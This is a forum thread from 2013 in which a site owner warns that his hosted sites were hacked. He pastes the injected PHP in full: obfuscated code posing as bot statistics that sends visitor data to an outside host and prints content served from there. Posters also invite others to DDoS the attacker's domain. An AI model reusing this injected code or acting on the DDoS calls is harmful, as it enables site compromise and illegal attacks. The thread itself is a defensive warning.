Best Blackhat Forum

Best Blackhat Forum > General Discussion > Announcements And Updates > SITE HACK WARNING !! - please read
Full Version: SITE HACK WARNING !! - please read
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3

simey69

05-28-2013, 05:44 PM
Hi,

Some of you know of me and the bits I do trying to keep things clean etc.
As such, I'm quite happy to say my sites are strong and secure - good passwords, all the usual stuff.
Some sites are WP, minimal plugins and themes, all clean as you'd expect.
the main sites are hand coded php, so very unlikely...

To my shock, more anger... I've just noticed that all my accounts in my reseller account have been hacked..
All the index pages have been tampered with - all timestamped the same day, a few days ago.
The code is a crappy content fetch made to look like stats code.
visitng the tosser domain redirects to some bots vs browser site.

public code viewing and viewing as search engine show no delivered payload...

the inserted code is:
Code:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)and&(strstr($sUserAgent, 'yahoo') == false)and&(strstr($sUserAgent, 'baidu') == false)and&(strstr($sUserAgent, 'msn') == false)and&(strstr($sUserAgent, 'opera') == false)and&(strstr($sUserAgent, 'chrome') == false)and&(strstr($sUserAgent, 'bing') == false)and&(strstr($sUserAgent, 'safari') == false)and&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true and& isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVE​R['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

this points to some tosser here:
Code:
http://mbrowserstats.com/statH/stat.php

whois gives some pointless info, but I will chase it anyway
Code:
http://whois.domaintools.com/mbrowserstats.com
if anyone fancies DDOS'ing that D***H*** into oblivion.. feel free

My Host is being slightly less than useless right now, thankfully I don't need their help, just an indication of how they got in

you'll see this attack widely reported on the net, starting from feb this year, when the domain was regsitered...

checking your source by viewing via browser etc will not help - you need to check for unexpected changes by ftp browsing.

simey69

05-28-2013, 06:05 PM
quick update - if you do have this crap on your site...

- Check and clean all index files

When cleaning a WP site
- Check and clean all index files
- in themes, also check and clean footer.php and page.php files

it's seems to be from some crappy crawler bot as the patterm is quite precise.

Si

HairyNed

05-28-2013, 06:34 PM
The dirty little defacing skid cunts.
I have sent you a PM about some DDOS fun.

SkepticJudge

05-28-2013, 10:23 PM
Thanks for this, I've been noticing some odd crawlers recently on my site as well but I've installed a plugin that helps me in blocking tons of IPs and other things base on rules I base and if they break it they're automatically banned for 1 week and I get notified.

Reaz

05-28-2013, 10:32 PM
Thanks a lot for share this info mate.. Thanks..

Shadowdog

05-28-2013, 10:59 PM
Thanks for letting us know, I will be reviewing my sites for this from now on.

simey69

05-29-2013, 01:17 AM
Quick update...
Quite odd, it seems the attack may have been linked in some way to filezilla ftp I have on this machine.

My machine is clean, - very clean - I check often with a variety of tools.
I need this machine daily, too much to risk crappy downloads on.. so I never run windows programs etc that I've 'obtained' on this machine, it's kept in a clean and safe state, saying that, I never download windows stuff only php and embedded source etc.

The reason I'm pointing the finger is that all of the accounts - exactly - on the filezilla ftp on this machine are the ones that got hit.
There are several others that got totally missed, too many to be chance, as it's an exact match to the 20+ accounts on this software.

hmmm...

Si

R4g3

05-29-2013, 01:55 AM
Weird, is there any other commonality between the sites? Might it be the host that got hacked?

Cornholio

05-29-2013, 03:25 AM
Luckily this did not happen to me.

Thanks for the heads up!

jbrown63

05-29-2013, 04:14 AM
@simey69
Seems you caught a trojan that looked especially for the filezilla server manager XML file...

It contains all ftp account data in clear text (no encryption for passwords here :-(

Cheers, Johnny63
Pages: 1 2 3
Best Blackhat Forum > General Discussion > Announcements And Updates > SITE HACK WARNING !! - please read
Reference URL's